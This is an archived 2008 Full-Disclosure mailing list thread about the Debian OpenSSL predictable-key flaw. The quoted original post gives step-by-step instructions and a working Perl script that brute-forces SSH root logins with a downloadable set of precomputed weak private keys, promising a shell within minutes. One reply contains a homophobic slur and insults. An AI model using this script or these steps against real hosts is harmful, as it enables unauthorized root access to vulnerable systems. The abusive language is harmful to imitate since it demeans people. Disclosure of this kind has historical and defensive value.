| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 19 May 2008 12:37:07 +0200
From: "Ronald van der Westen" <rvdwesten@...il.com>
To: reepex <reepex@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Working exploit for Debian generated SSH Keys
Why reinvent the wheel?
On Mon, May 19, 2008 at 6:20 AM, reepex <reepex@...il.com> wrote:
> why don't you code it yourself instead of being a script kiddie faggot. and
> don't use ";-)" to look cool when you beg for warez.
>
> On Sun, May 18, 2008 at 10:13 AM, bob harley <bobb.harley@...il.com> wrote:
>>
>> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing
>> nicely ;-)
>>
>> On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm@...dbeef.de> wrote:
>>>
>>> Hi full-disclosure,
>>>
>>> the debian openssl issue leads that there are only 65.536 possible ssh
>>> keys generated, cause the only entropy is the pid of the process
>>> generating the key.
>>>
>>> This leads to that the following perl script can be used with the
>>> precalculated ssh keys to brute force the ssh login. It works if such a
>>> keys is installed on a non-patched debian or any other system manual
>>> configured to.
>>>
>>> On an unpatched system, which doesn't need to be debian, do the
>>> following:
>>>
>>> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>>>
>>> 2. Extract it to a directory
>>>
>>> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
>>> Bits, generated on an upatched debian (this is the key this exploit will
>>> break)
>>>
>>> 4. Run the perl script and give it the location to where you extracted
>>> the bzip2 mentioned.
>>>
>>> #!/usr/bin/perl
>>> my $keysPerConnect = 6;
>>> unless ($ARGV[1]) {
>>> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>>> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>>> print "By mm@...dbeef.de\n";
>>> exit 0;
>>> }
>>> chdir($ARGV[0]);
>>> opendir(A, $ARGV[0]) || die("opendir");
>>> while ($_ = readdir(A)) {
>>> chomp;
>>> next unless m,^\d+$,;
>>> push(@a, $_);
>>> if (scalar(@a) > $keysPerConnect) {
>>> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
>>> ".$_ } @a)." ".$ARGV[1]);
>>> @a = ();
>>> }
>>> }
>>>
>>> 5. Enjoy the shell after some minutes (less than 20 minutes)
>>>
>>> Regards,
>>> Markus Mueller
>>> mm@...dbeef.de
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
Ronald van der Westen
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists